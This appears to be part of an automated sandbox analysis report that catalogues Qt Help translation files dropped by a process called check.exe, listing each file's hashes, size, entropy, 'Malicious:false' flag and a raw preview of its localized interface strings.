                                                                                                                                                                                                            Preview:<.d....!..`.......deB..........B.%.....5.0T......K:^.....Uj....?.`.....f..YJ...V.E.4...............>............B<s...z.B\>...\........+.s...Q.zq....C..9....4..vR...B..@.......@.......:......8Z......g.N......F....>...........t.....D ......k.N.......I......^....|.`#....I..2....<..G....^...N.........................;..........K....y..........GN......NO...........,.K.H.............pN......V...................."..........>.............~........%c.....z.q....i........".F.i.l.t.e.r. .h.i.n.z.u.f...g.e.n..........Add Filter.....FilterNameDialogClass.....".N.a.m.e. .d.e.s. .F.i.l.t.e.r.s.:..........Filter Name:.....FilterNameDialogClass.......O.h.n.e. .T.i.t.e.l..........Untitled.....QHelp.....\.D.i.e. .K.a.t.a.l.o.g.d.a.t.e.i. .k.a.n.n. .n.i.c.h.t. .k.o.p.i.e.r.t. .w.e.r.d.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....\.D.a.s. .V.e.r.z.e.i.c.h.n.i.s. .k.a.n.n. .n.i.c.h.t. .a.n.g.e.l.e.g.t. .w.e.r.d.e.n.:. .%.1..........Cannot create directory: %
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10704
                                                                                                                                                                                                            Entropy (8bit):4.481291573289571
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:q9J9j7e4BQhD0h61nnKz+DJF/45ojDU9V1Wa/rmtIBMH:Wp64ShDnnKz+FhjQpWa/ytoMH
                                                                                                                                                                                                            MD5:9EDF433AB9EE5FC7CF7782370150B26A
                                                                                                                                                                                                            SHA1:A918AE15A0DF187C7789BE8599A80E279F039964
                                                                                                                                                                                                            SHA-256:FD16B279F8CF69077F75E94D90C9C07A2AFFF3948A579E3789F5FFB5E5F4202D
                                                                                                                                                                                                            SHA-512:88245F6FBAAF603A03D7EA2341411AE040791D47C9FF110C6D6CDD8165F0A8BA7A4A0DA5CD543BBE95A4E93FE3A81E95B3664E00C11791FBCB4923E3A80ABC60
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es_ESB...(.(.....7.0T..../.5w... C.Uj......`.......a[....0..........t..............39..........&e.........B<s...D..M^..............J..%p.O5^...I..)^...1..o>.......J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>....................G...#...w............!.......%..,................^............$a......6.>..........#...K...........$C.W.b....._Xn......GN...|..~.......TH.."..!.....5.K.H..#f.........pN...j......'..P.~... .o........(....>....."<..~....c.s.>.....o.... ..z.q..........................u.h....!p.......*..e....Qi..'}......(.L.a. .r.a.z...n. .d.e. .e.s.t.o. .p.u.e.d.e. .s.e.r. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n. .e.s.t... .s.i.e.n.d.o. .i.n.d.e.x.a.d.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....2.R.e.s.u.l.t.a.d.o.s. .d.e. .l.a. .B...s.q.u.e.d.a..........Search Results.....QCLu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10922
                                                                                                                                                                                                            Entropy (8bit):4.459946393010639
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:w4BIn67/WsmoB3r6M/eYlSbyE7DnvE7pcn9nPJZe7nOFovzcNn7Uhmio+2/p53I/:w4N19fq3n2c9Bucuhmi52/X3Qpam
                                                                                                                                                                                                            MD5:D520C7F85CC06C66715A2B6622BF0687
                                                                                                                                                                                                            SHA1:47292D068172FBC9DC0D9BE2F479E890A37CE138
                                                                                                                                                                                                            SHA-256:687E351C062F688AAFF6CF05218D6017B80B1A1B4238D1D30250A55EE41C5FED
                                                                                                                                                                                                            SHA-512:736B50BB64751B127300BCAFE88888A9D9A2081CBF934EDCFFEF6CEF0575505AFDF714273A97671ABB598AE3D23C8E55F7DCD632FB0AA219ED5F763768576E04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr_FRB...(.(.....y.0T....K.5w...!1.Uj....*.`.......a[............5..t..............39....m.....'W.......S.B<s...d..M^.. ...........J..&`.O5^...+..)^......o>.......J..&.......$....t.....8dz..%..D ......k.N.....k.N...D...n.......I...........c..2>..........M.........G...$...w....K..................,................^............$a......6.>...c......$...K....'......%M.W.b....._Xn...j..GN......~.......TH..#..!.......K.H..$Z......,..pN..........'..P.~.....o........(....h.....#4..~......s.>...M.o....!..z.q...........p......L.........h...."^.......b..e.....i..(W......(.I.l. .e.s.t. .p.o.s.s.i.b.l.e. .q.u.e. .c.e.l.a. .s.o.i.t. .d... .a.u. .f.a.i.t. .q.u.e. .l.a. .d.o.c.u.m.e.n.t.a.t.i.o.n. .e.s.t. .e.n. .c.o.u.r.s. .d.'.i.n.d.e.x.a.t.i.o.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.e. .:..........Note:.....QCLuceneResultWidget.....2.R...s.u.l.t.a.t.s. .d.e. .l.a. .r.e.c.h.e.r.c.h.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10891
                                                                                                                                                                                                            Entropy (8bit):4.5087667371046205
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:Im7gBZHx4hCTNarW6EJDvoIR765f40wqNcMi/8F/Ihon:v0fHccarW6Eh61wqNcMi/Q/won
                                                                                                                                                                                                            MD5:B62C74793741FC386332A59113E8D412
                                                                                                                                                                                                            SHA1:589CE099F2C1D92581B5CF0E17BE49A2BF0014D4
                                                                                                                                                                                                            SHA-256:7399A248609974773F60866C87B78EA7DFBC4F750313D692F7886CD763883C9F
                                                                                                                                                                                                            SHA-512:D8E1A3B3732662BA572A1387651F2625742710834BEDB41809DA47B5D23020AA1B558B64A00C10C605D1844F0544483163F4A6227CAFFA5ECDABF3BBF4E12D9B
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB...8.(.......0T......Uj......`.....`.a[....F..........t..............1"... S.39.......s...!.............'F.........B<s...8..MQ.. ...........J..&S.0.....x.O5Q......)Q...O..o>...{.......#...J..&.......$....t.....8dz..%..D ......k.A.....k.A.......n.......I.................."...21....................G...#...w............[...!...?...........Q...?........$a....v.6.>..........$...K...........%0._Xa......GA...n..........~.......TH..#..K.H..$M.........pA...Z......'..P.~...B.o........(..........#+..~......s.1.....o....!..z.q...e.............................. ..e....wi..((......(.A. .r.a.z...n. .d.i.s.t.o. .p.o.d.e. .s.e.r. .q.u.e. .a. .d.o.c.u.m.e.n.t.a.c.i...n. .a...n.d.a. .e.s.t.e.a. .a. .i.n.d.e.x.a.r.s.e...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.....*.R.e.s.u.l.t.a.d.o.s. .d.a. .p.r.o.c.u.r.a..........Search Results.....QCLucene
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10284
                                                                                                                                                                                                            Entropy (8bit):4.674501432335502
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:RNY+rCG3e7LBqYqYseBb/FEWBgSn62TdJgDO9esYGY3DtgGh621XlZ/8kWvIMK:4+rheHYYZdBb/pgSn62T/FeVD3DGGh62
                                                                                                                                                                                                            MD5:5A56E9E2ED6ECE3F249D1C2A7EB3B172
                                                                                                                                                                                                            SHA1:D6F079F40FBB813B0293C1D2210BAE7084092FEC
                                                                                                                                                                                                            SHA-256:70F33B569C2942F41C6D634EA6A61CB8D80EB2C7011BAD48EF6DBAE9677960D5
                                                                                                                                                                                                            SHA-512:28947128FC51791CFDBFD3958FAF9B33979DB52C90AE0159EDB01FE6032284EB37BC05187162983A0435560BCEA864B008F499CDB4CE662792599FE20A37972A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......hu_HUB...(.(.......0T......5w......Uj......`.....4.a[....N..........t....".........39..........%..........B<s...8..M^...8..........J..$..O5^......)^...]..o>.......J..$......."N...t.....8dz..#g.D ......k.N...>.k.N.......n.......I..............2>..........a.........G...!...w.......................,................^............$a......6.>.........."...K....m......"..W.b...l._Xn...~..GN......~.......TH..!F.!.......K.H..!..........pN..........%..P.~...<.o........(.......... ...~......s.>...{.o.....c.z.q...K.......v......l.........h.... ........t..e....mi..%.....~.(.E.z. .a.m.i.a.t.t. .l.e.h.e.t.,. .h.o.g.y. .a. .d.o.k.u.m.e.n.t...c.i... .m...g. .i.n.d.e.x.e.l...s. .a.l.a.t.t. .v.a.n...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......M.e.g.j.e.g.y.z...s.:..........Note:.....QCLuceneResultWidget.....&.K.e.r.e.s...s.i. .e.r.e.d.m...n.y.e.k..........Search Results.....QCLuceneResultWidget.......A
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10612
                                                                                                                                                                                                            Entropy (8bit):4.458970627057882
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:nRxcfy71b+myBN16cbc+w45rtlTnzo7uHp3JQJ9cVu4BJ1G82g33vOVrNL/7nEF1:RR4R/fJn9JizTgnqrNL/b0hH2K
                                                                                                                                                                                                            MD5:3639B57B463987F6DB07629253ACD8BF
                                                                                                                                                                                                            SHA1:65935A67C73F19FCF6023FB95030A5ACAF9DA21C
                                                                                                                                                                                                            SHA-256:316FE8D0815E2B4B396895BEB38EF1A40431915B5E054DF80F4C0CD556F26E4B
                                                                                                                                                                                                            SHA-512:AD7CA93D93A69F273CE80BE7F2F477543B9C5F9C7E4D7448223BFF084EA956B626D6837F22D83C5E282688B938F58C29073C4B5C6F26A797F716C14FABF9FFEE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......it_ITB...(.(.....g.0T....y.5w... ..Uj....2.`.......a[............'..t..............39..........&..........B<s...j..M^...h......K...J..%..O5^...K..)^......o>...u...J..%.......#....t.....8dz..$..D ......k.N.....k.N.......n.......I..............2>.................o..G..."...w............-......./..,................^...'........$a......6.>..........#...K...........$..W.b....._Xn......GN......~.......TH.."n.!.....5.K.H..#"......>..pN..........&..P.~.....o.....~..(....p.....!...~....A.s.>.....o.... ..z.q..........................q.h....!0.......*..e....;i..'!......(.L.a. .c.a.u.s.a. .d.i. .c.i... .p.o.t.r.e.b.b.e. .e.s.s.e.r.e. .c.h.e. .l.'.i.n.d.i.c.i.z.z.a.z.i.o.n.e. .d.e.l.l.a. .d.o.c.u.m.e.n.t.a.z.i.o.n.e. ... .a.n.c.o.r.a. .i.n. .c.o.r.s.o...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......N.o.t.a.:..........Note:.....QCLuceneResultWidget.......R.i.s.u.l.t.a.t.i. .d.e.l.l.a. .r.i.c.e.r.c.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7917
                                                                                                                                                                                                            Entropy (8bit):5.680408580146589
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:mP6J37GcBzRjYEPEJJGTnwfJJxb7FTPjzzZBL3/q/I53:mSVqclR5s6Tnwfb7Pj/PL3/q/w3
                                                                                                                                                                                                            MD5:1380A9352C476071BDA5A5D4FED0B6C5
                                                                                                                                                                                                            SHA1:9B737ED05F80FE5D3CD8F588CCEC16BB11DD3560
                                                                                                                                                                                                            SHA-256:AE603B2C0D434D40CDE433FFCBA65F9EE27978A9E19316007BE7FE782A5B8B47
                                                                                                                                                                                                            SHA-512:EC3D68126488C3A163898BACAF7E783217868573635182CAF511ED046B4BE1F99A71FBB24DA607CCB50EDAF70893007AAEE9A6BAAE4C1CD33465A0915AA965DA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......jaB...(.(.....S.0T......5w....'.Uj......`.......a[............u..t............!.39.....................B<s......M^..............J...>.O5^...O..)^......o>.......J...............t...w.8dz.....D ......k.N.....k.N...H...n.......I...........i..2>...<......G......9..G....P..w............i..........,................^..........'.$a......6.>...5..........K............S.W.b...2._Xn......GN...@..~.......TH.....!.......K.H.............pN...........S.P.~.....o.....|..(..............~....o.s.>.....o.......z.q..................@.........h.....&....... ..e.....i........@.(0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0K0.0W0.0~0[0.0..).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget......l..:..........Note:.....QCLuceneResultWidget......i.}"}Pg...........Search Results.....QCLuceneResultWidget.....R0.0.0.0.0.0.0n}"_.0nO\b.0L}BN.0W0f0D0j0D0_0.0.i.}"}Pg.0LN.[.Qh0jS..`'0L0B0.0~0Y0..........VThe search results may
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5708
                                                                                                                                                                                                            Entropy (8bit):5.698914195742074
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:elPQHJ6L4c7LaQaFQv2QEhBL+Ejma0W40U0BzlQlcrnUSaTIdspIc18CLRSM3LBY:dHI97W1BbNz1VqqzJpoj5y5uY7OGrWFE
                                                                                                                                                                                                            MD5:CD15674A652C2BF435F7578E119182F8
                                                                                                                                                                                                            SHA1:AEA22E4A0D21396733802C7AB738DDD03737B7D6
                                                                                                                                                                                                            SHA-256:F11C64694E8E34E1D2C46C1A1D15D6BA9F2DB7B61DE4FDF54ECA5AB977C3E052
                                                                                                                                                                                                            SHA-512:88BFA112F4DBC0BFB4013CE0937E5180B4AB4A217FC8A963798C7C86532E794E4A1AD88416AE42F26A1C0631B465A5D69BFE75366E048502F5E21F4115A12F19
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......koB............%.......0T......K:^...g.Uj......`........YJ...>.E.4...........z...>..........;.B<s...K.B\>...b........+.s.....zq....[..9....F..vR......@.......@.......:....c.8Z......g.N...7..F....|...........t.....D ......k.N.......I...m..^......`#....!..2.......G....@...N.................................X..K....{.......i..GN......NO.............K.H..........S..pN...z..V...............................>...........:.~.....i..%c.....z.q....i...s......D.0. .............Add Filter.....FilterNameDialogClass.......D.0. .t...:..........Filter Name:.....FilterNameDialogClass........... ...L..........Untitled.....QHelp.....(...L... ...|.D. .....`. ... ...L.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....".....0...|. .... ... ...L.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....2...|. .%.1... ...x. .L.t...D. .... ... .................&Cannot create index tables in file %1......QHelpCollectionHandler.....,.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9673
                                                                                                                                                                                                            Entropy (8bit):4.622652249027856
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:TO/7kBL9wGu3wtCnlhLJUBB7oph+mZ18LgP:T8QnwcCnlhdvphpZ18LgP
                                                                                                                                                                                                            MD5:2B68446B69D9AA40B273D75A581D2992
                                                                                                                                                                                                            SHA1:8A09BD38998543B74E2673478EDD54FB4BBDD068
                                                                                                                                                                                                            SHA-256:CC6CB4D8C54086224672F2E49E623C8CB7C0C1CD65B8D5ECD42FC9BA3A6065BD
                                                                                                                                                                                                            SHA-512:F3A3D6A416B3411613B06FC3EE56625D4D4DE80087182AB0D0601E49314861ABEF97D11A15B4C0511911544A59FBC4A4A52F0CCF0FD43F763A76A8922D8E57B6
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......plB.....(.......0T....T.5w......Uj... R.`.......a[...............t............2.39....H......6.......n.B<s.. ...M^..._......6.O5^...F..)^......o>...............t.....D ......k.N.....k.N.../...n.......I...W..........2>...w................G.......w............&.......:..,................^...(..... ..$a....?.6.>...$..........K......W.b....._Xn......GN...Y..~......!.....*.K.H...E....."...pN...-.........P.~...}.o........(....1..~......s.>......%c.."..o.....r.z.q............................h................e.....i..#.......N.i.e.n.a.z.w.a.n.y..........Untitled.....QHelp.....P.N.i.e. .m.o.|.n.a. .s.k.o.p.i.o.w.a... .p.l.i.k.u. .z. .k.o.l.e.k.c.j...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....>.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .k.a.t.a.l.o.g.u.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....H.N.i.e. .m.o.|.n.a. .u.t.w.o.r.z.y... .t.a.b.e.l. .w. .p.l.i.k.u. .%.1........... Cannot create tables in file
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7288
                                                                                                                                                                                                            Entropy (8bit):5.297177914619657
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:dBJjvfq7D6X68uBAzlp5W9+yBPZZZMM7vL0PXJL:JKrMEL0PXJL
                                                                                                                                                                                                            MD5:794AF445A5D7082D51BD22683449F86D
                                                                                                                                                                                                            SHA1:3A0C369872B112A1572AA17EEB814B168B225D98
                                                                                                                                                                                                            SHA-256:557B644E6DA5F1EC720EF93965617087E4D1F40B2494CC5AA524CF3796108DE7
                                                                                                                                                                                                            SHA-512:D42C870A16AEE7626BBE24886AD423895529A2F1A51AC2DBC303BC0E4EF9D3241FE894ECA3F7217AD408C8DCEE165CA4B89D84570357B0EB80340A3F72B0A846
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ruB..........\.%.......0T......K:^.....Uj....L.`........YJ...X.E.4...............>............B<s.....B\>............+.s.....zq.......9....B..vR...L..@.......@....G..:......8Z......g.N......F....>...........t.....D ....R.k.N...E...I...W..^......`#....s..2.......G....^...N.........................K.......d..K............O..GN...b..NO.............K.H.............pN...P..V....................g..........>.............~........%c.....z.q....i........$...>.1.0.2.;.5.=.8.5. .D.8.;.L.B.@.0..........Add Filter.....FilterNameDialogClass.........<.O. .D.8.;.L.B.@.0.:..........Filter Name:.....FilterNameDialogClass.........5.7.K.<.O.=.=.K.9..........Untitled.....QHelp.....b...5. .C.4.0.;.>.A.L. .A.:.>.?.8.@.>.2.0.B.L. .D.0.9.;. .:.>.;.;.5.:.F.8.8. .A.?.@.0.2.:.8.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....<...5. .C.4.0.;.>.A.L. .A.>.7.4.0.B.L. .:.0.B.0.;.>.3.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....`
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10388
                                                                                                                                                                                                            Entropy (8bit):4.70568613551943
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:uPq7iBWseXKkVu4+Qv9zEJ1xGMaLNmBgJqdC6/MxIMt:LWcseV04Xv9zEoLNDJqdX/MxRt
                                                                                                                                                                                                            MD5:75C94E59F1FC5312AE25381C247AF992
                                                                                                                                                                                                            SHA1:E3E5F4582CC5FAFE6DF43644D11484861023C084
                                                                                                                                                                                                            SHA-256:F41E33E1D790BD0D3EB180F1F875BC191FE74773628F25C2CAD95E1402E66867
                                                                                                                                                                                                            SHA-512:959B8F4D57FC9728DD4804322333D1792D45A0EE85615B559E0CA3BD2DEA22E2C8C68C6482AE9425D29C819B0ED27473EDDC82EF4B6ECFFB2E2E7B56E1509B63
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......sk_SKB...8.(.......0T......Uj......`.....0.a[....8..........t..............1"......39.......s........... .....%..........B<s...6..MQ..............J..$-.0.......O5Q......)Q...;..o>...........G...J..$......."....t.....8dz..#..D ......k.A...2.k.A.......n..._...I.................. ...21..........e.........G...!...w....Y...........!...........=...Q............$a......6.>.........."...K....i......# ._Xa..."..GA..............~.......TH..!{.K.H.."7.........pA..........%..P.~.....o........(..........!...~....u.s.1.....o.......z.q...c..............................f..e....9i..&-......(.D...v.o.d.o.m. .m...~.e. .b.y.e. .t.o.,. .~.e. .d.o.k.u.m.e.n.t...c.i.a. .s.t...l.e. .n.i.e. .j.e. .z.i.n.d.e.x.o.v.a.n.....).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......P.o.z.n...m.k.a.:..........Note:.....QCLuceneResultWidget.....".V...s.l.e.d.k.y. .h.>.a.d.a.n.i.a..........Search Results.....QCLuceneResultWidg
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10363
                                                                                                                                                                                                            Entropy (8bit):4.613473842638716
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:vNBqTi7qBCVIQf54EslZ2Jy/L/BnmpP0bX3caK6q1B6/hgIlCCUb0:vjq2+UVT4ESZOYmpP0bX26q1I/yqCCUw
                                                                                                                                                                                                            MD5:3B0AEE27B193A8A563C5CB5C7C4FE60F
                                                                                                                                                                                                            SHA1:C94E832595EC765370553468F87C02DB7E7D138A
                                                                                                                                                                                                            SHA-256:2EC955E662407EBCD8DCDAE5AAA21E4108E0B5B0AEE0E9DB712C27072943535F
                                                                                                                                                                                                            SHA-512:EBC25C378126876F44279E23CA0CF06FC9E7D5F51AD7E3DBDABA7A50C81112EDC1C76F7FD0AF47E447A93C3593BB953A0C9C1FBBFC49494E6B29BF21655F690E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......slB...8.(.....E.0T......Uj......`.......a[............!..t..............1"....;.39.......s....^............$........i.B<s...,..MQ..........}...J..#..0.....Z.O5Q...[..)Q......o>...............J..$I......"W...t...C.8dz..#H.D ......k.A.....k.A.......n.......I.................. P..21....................G...!...w............?...!...3...........Q...+........$a....>.6.>.........."...K...........".._Xa......GA..............~....A..TH..!I.K.H..!..........pA...>......%..P.~...>.o........(....d..... ...~......s.1.....o.......z.q.....................................e....{i..&.....z.(.R.a.z.l.o.g. .j.e. .m.o.r.d.a. .t.o.,. .d.a. .s.e. .d.o.k.u.m.e.n.t.a.c.i.j.o. .a.e. .v.e.d.n.o. .i.n.d.e.k.s.i.r.a...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.......O.p.o.m.b.a.:..........Note:.....QCLuceneResultWidget.....".R.e.z.u.l.t.a.t.i. .i.s.k.a.n.j.a..........Search Results.....QCLuceneResultWidget.......R.e.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4629
                                                                                                                                                                                                            Entropy (8bit):4.68793836539357
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:BoiK0UD2wMLb7Lqlguotqbww5BLNwWjK0kHU9zuQlUVUfniqthweEIFwC18lLEGA:PXFf7pU75BWWOpcJcVqDFNz8brgyf76r
                                                                                                                                                                                                            MD5:32D6EE3D8EE6408A03E568B972F93BCB
                                                                                                                                                                                                            SHA1:582EE079DBD42000C378E0701D26405750524DBA
                                                                                                                                                                                                            SHA-256:EBDECA0CFEE7A9441DEB800BABFD97C63BC4E421DA885C55B3BD49725EBACD25
                                                                                                                                                                                                            SHA-512:24AAA30B9CB4DB82A57411FBA24A87D70D8B845AE48A6FDA633D0BE6B824B58FDD2F450C2B385F16F49E2F9C6FA0A3124FD0F28594726940F996C66F8F3216CC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......tr_TRB.....%.....[.0T......Uj......`.....$..............L.B<s.....B\>..........4.+.s...............t.....D ......k.N...5...I......2.......G....5...N..........a...............f..K....9..........GN...........@.K.H..........q..pN...t..........>...z.~...../..%c.....z.q....i..........B.a._.l.1.k.s.1.z..........Untitled.....QHelp.....J.K.o.l.e.k.s.i.y.o.n. .d.o.s.y.a.s.1. .k.o.p.y.a.l.a.n.a.m.1.y.o.r.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....2.D.i.z.i.n. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....\.%.1. .d.o.s.y.a.s.1.n.d.a. .d.i.z.i.n. .t.a.b.l.o.l.a.r.1. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r...........&Cannot create index tables in file %1......QHelpCollectionHandler.....N.%.1. .d.o.s.y.a.s.1.n.d.a. .t.a.b.l.o.l.a.r. .o.l.u._.t.u.r.u.l.a.m.1.y.o.r........... Cannot create tables in file %1......QHelpCollectionHandler.....P.S.q.l.i.t.e. .v.e.r.i.t.a.b.a.n.1. .s...r...c...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):9750
                                                                                                                                                                                                            Entropy (8bit):5.281035122342072
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:eMp79BCN+u8hhbHbny+HJouHgei50JBSfDvbetpP/RIkT:eIhgNgBbny+phiS3SfDDetpP/RRT
                                                                                                                                                                                                            MD5:90A776917D534B65942063C319573CDC
                                                                                                                                                                                                            SHA1:5DF3B213D985A3BBDB476B37B7780D7D7DF17E41
                                                                                                                                                                                                            SHA-256:497CFC473684692EE44D7A3795E8FB2270C57069FD9EB98A615DD29AB9BE8A7C
                                                                                                                                                                                                            SHA-512:B34A019716B50CE8E1E20AC32756B3B0D5802971F7A04F4BDDE2418DA551AFB9742B79E934979DB6FAB9DAC05D7D26A3B19ABA77158321F8D9AAB08AEBBD455A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
